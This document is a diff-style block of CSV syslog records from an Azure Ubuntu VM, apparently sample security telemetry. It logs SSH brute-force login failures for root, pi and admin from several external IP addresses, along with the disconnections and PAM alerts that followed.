+8349,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 05:50:15,UbuntuDevEnv,2019-06-11 05:50:14,auth,UbuntuDevEnv,info,message repeated 5 times: [ Failed password for root from 42.227.172.82 port 39162 ssh2],119977,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,42.227.172.8,39162,,
+8350,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 05:50:15,UbuntuDevEnv,2019-06-11 05:50:14,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,119977,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+8351,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 05:50:15,UbuntuDevEnv,2019-06-11 05:50:14,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 42.227.172.82 port 39162: Too many authentication failures [preauth],119977,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,42.227.172.8,39162,,
+8352,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 05:50:15,UbuntuDevEnv,2019-06-11 05:50:14,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=42.227.172.82  user=root,119977,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,42.227.172.8,,0,
+8353,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 05:50:15,UbuntuDevEnv,2019-06-11 05:50:14,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 42.227.172.82 port 39162 ssh2 [preauth],119977,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,42.227.172.8,39162,,
+8354,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 06:53:25,UbuntuDevEnv,2019-06-11 06:53:24,auth,UbuntuDevEnv,info,Connection closed by 218.92.0.186 port 11670 [preauth],8882,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,218.92.0.1,11670,,
+8355,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 08:09:35,UbuntuDevEnv,2019-06-11 08:09:35,auth,UbuntuDevEnv,info,Invalid user pi from 108.39.73.192 port 39014,25596,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pi,108.39.73.1,39014,,
+8356,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 08:09:35,UbuntuDevEnv,2019-06-11 08:09:35,auth,UbuntuDevEnv,info,Invalid user pi from 108.39.73.192 port 39016,25597,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pi,108.39.73.1,39016,,
+8357,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 08:09:35,UbuntuDevEnv,2019-06-11 08:09:35,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,25596,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+8358,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 08:09:35,UbuntuDevEnv,2019-06-11 08:09:35,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=108.39.73.192,25596,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,108.39.73.1,,0,
+8359,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 08:09:35,UbuntuDevEnv,2019-06-11 08:09:35,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,25597,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+8360,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 08:09:35,UbuntuDevEnv,2019-06-11 08:09:35,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=108.39.73.192,25597,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,108.39.73.1,,0,
+8361,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 08:09:38,UbuntuDevEnv,2019-06-11 08:09:37,auth,UbuntuDevEnv,info,Failed password for invalid user pi from 108.39.73.192 port 39014 ssh2,25596,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pi,108.39.73.1,39014,,
+8362,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 08:09:38,UbuntuDevEnv,2019-06-11 08:09:37,auth,UbuntuDevEnv,info,Failed password for invalid user pi from 108.39.73.192 port 39016 ssh2,25597,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pi,108.39.73.1,39016,,
+8363,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 08:09:38,UbuntuDevEnv,2019-06-11 08:09:37,auth,UbuntuDevEnv,info,Connection closed by invalid user pi 108.39.73.192 port 39014 [preauth],25596,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pi,108.39.73.1,39014,,invalid
+8364,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 08:09:38,UbuntuDevEnv,2019-06-11 08:09:37,auth,UbuntuDevEnv,info,Connection closed by invalid user pi 108.39.73.192 port 39016 [preauth],25597,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pi,108.39.73.1,39016,,invalid
+8365,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 08:12:51,UbuntuDevEnv,2019-06-11 08:12:51,auth,UbuntuDevEnv,info,Disconnected from 104.236.122.193 port 44254 [preauth],26283,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,104.236.122.1,44254,,
+8366,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 08:12:51,UbuntuDevEnv,2019-06-11 08:12:51,auth,UbuntuDevEnv,info,Received disconnect from 104.236.122.193 port 44254:11: Bye Bye [preauth],26283,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,104.236.122.1,44254,,
+8367,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 08:17:07,UbuntuDevEnv,2019-06-11 08:17:06,auth,UbuntuDevEnv,info,Invalid user admin from 42.177.56.57 port 59651,27271,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,42.177.56.5,59651,,
+8368,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 08:17:07,UbuntuDevEnv,2019-06-11 08:17:06,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,27271,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+8369,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 08:17:07,UbuntuDevEnv,2019-06-11 08:17:06,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=42.177.56.57,27271,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,42.177.56.5,,0,
+8370,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 08:17:08,UbuntuDevEnv,2019-06-11 08:17:08,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 42.177.56.57 port 59651 ssh2,27271,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,42.177.56.5,59651,,
+8371,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 08:17:09,UbuntuDevEnv,2019-06-11 08:17:08,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,27271,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+8372,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 08:17:10,UbuntuDevEnv,2019-06-11 08:17:10,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 42.177.56.57 port 59651 ssh2,27271,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,42.177.56.5,59651,,
+8373,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 08:17:11,UbuntuDevEnv,2019-06-11 08:17:10,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,27271,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+8374,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 08:17:13,UbuntuDevEnv,2019-06-11 08:17:12,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 42.177.56.57 port 59651 ssh2,27271,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,42.177.56.5,59651,,
+8375,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 08:17:13,UbuntuDevEnv,2019-06-11 08:17:12,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,27271,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+8376,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 08:17:15,UbuntuDevEnv,2019-06-11 08:17:14,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 42.177.56.57 port 59651 ssh2,27271,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,42.177.56.5,59651,,
+8377,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 08:17:15,UbuntuDevEnv,2019-06-11 08:17:15,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,27271,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+8378,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 08:17:17,UbuntuDevEnv,2019-06-11 08:17:17,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 42.177.56.57 port 59651 ssh2,27271,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,42.177.56.5,59651,,
+8379,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 08:17:17,UbuntuDevEnv,2019-06-11 08:17:17,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,27271,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+8380,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 08:17:19,UbuntuDevEnv,2019-06-11 08:17:19,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for invalid user admin from 42.177.56.57 port 59651 ssh2 [preauth],27271,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,42.177.56.5,59651,,
+8381,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 08:17:19,UbuntuDevEnv,2019-06-11 08:17:19,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 42.177.56.57 port 59651 ssh2,27271,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,42.177.56.5,59651,,
+8382,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 08:17:19,UbuntuDevEnv,2019-06-11 08:17:19,auth,UbuntuDevEnv,info,Disconnecting invalid user admin 42.177.56.57 port 59651: Too many authentication failures [preauth],27271,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,42.177.56.5,59651,,
+8383,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 08:17:19,UbuntuDevEnv,2019-06-11 08:17:19,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,27271,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+8384,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 08:17:19,UbuntuDevEnv,2019-06-11 08:17:19,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=42.177.56.57,27271,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,42.177.56.5,,0,
+8385,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 09:14:05,UbuntuDevEnv,2019-06-11 09:14:05,auth,UbuntuDevEnv,info,Did not receive identification string from 190.19.173.174 port 48830,39748,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,190.19.173.1,48830,,
+8386,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 11:11:59,UbuntuDevEnv,2019-06-11 11:11:58,auth,UbuntuDevEnv,info,Received disconnect from 205.185.114.87 port 50840:11: Bye Bye [preauth],65720,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,205.185.114.8,50840,,
+8387,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 11:11:59,UbuntuDevEnv,2019-06-11 11:11:58,auth,UbuntuDevEnv,info,Disconnected from 205.185.114.87 port 50840 [preauth],65720,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,205.185.114.8,50840,,
+8388,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 11:29:15,UbuntuDevEnv,2019-06-11 11:29:14,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.138  user=root,69430,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+8389,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 11:29:17,UbuntuDevEnv,2019-06-11 11:29:16,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.138 port 43574 ssh2,69430,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,43574,,
+8390,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 11:29:23,UbuntuDevEnv,2019-06-11 11:29:22,auth,UbuntuDevEnv,info,message repeated 2 times: [ Failed password for root from 218.92.0.138 port 43574 ssh2],69430,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,43574,,
+8391,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 11:29:25,UbuntuDevEnv,2019-06-11 11:29:24,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.138 port 43574 ssh2,69430,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,43574,,
+8392,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 11:29:30,UbuntuDevEnv,2019-06-11 11:29:29,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.138  user=root,69430,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+8393,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 11:29:30,UbuntuDevEnv,2019-06-11 11:29:29,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 218.92.0.138 port 43574 ssh2 [preauth],69430,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,43574,,
+8394,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 11:29:30,UbuntuDevEnv,2019-06-11 11:29:29,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 218.92.0.138 port 43574: Too many authentication failures [preauth],69430,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,43574,,
+8395,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 11:29:30,UbuntuDevEnv,2019-06-11 11:29:29,auth,UbuntuDevEnv,info,message repeated 2 times: [ Failed password for root from 218.92.0.138 port 43574 ssh2],69430,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,43574,,
+8396,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 11:29:30,UbuntuDevEnv,2019-06-11 11:29:29,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,69430,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+8397,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 11:29:35,UbuntuDevEnv,2019-06-11 11:29:34,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.138  user=root,69501,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+8398,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 11:29:37,UbuntuDevEnv,2019-06-11 11:29:36,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.138 port 54344 ssh2,69501,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,54344,,
+8399,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 11:29:51,UbuntuDevEnv,2019-06-11 11:29:50,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 218.92.0.138 port 54344 ssh2 [preauth],69501,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,54344,,
+8400,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 11:29:51,UbuntuDevEnv,2019-06-11 11:29:50,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.138  user=root,69501,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+8401,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 11:29:51,UbuntuDevEnv,2019-06-11 11:29:50,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,69501,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+8402,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 11:29:51,UbuntuDevEnv,2019-06-11 11:29:50,auth,UbuntuDevEnv,info,message repeated 5 times: [ Failed password for root from 218.92.0.138 port 54344 ssh2],69501,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,54344,,
+8403,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 11:29:51,UbuntuDevEnv,2019-06-11 11:29:50,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 218.92.0.138 port 54344: Too many authentication failures [preauth],69501,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,54344,,
+8404,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 11:29:55,UbuntuDevEnv,2019-06-11 11:29:54,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.138  user=root,69572,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+8405,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 11:29:56,UbuntuDevEnv,2019-06-11 11:29:56,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.138 port 1646 ssh2,69572,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,1646,,
+8406,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 11:30:01,UbuntuDevEnv,2019-06-11 11:29:59,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.138 port 1646 ssh2,69572,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,1646,,
+8407,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 11:30:02,UbuntuDevEnv,2019-06-11 11:30:02,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.138 port 1646 ssh2,69572,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,1646,,
+8408,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 11:30:12,UbuntuDevEnv,2019-06-11 11:30:11,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 218.92.0.138 port 1646: Too many authentication failures [preauth],69572,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,1646,,
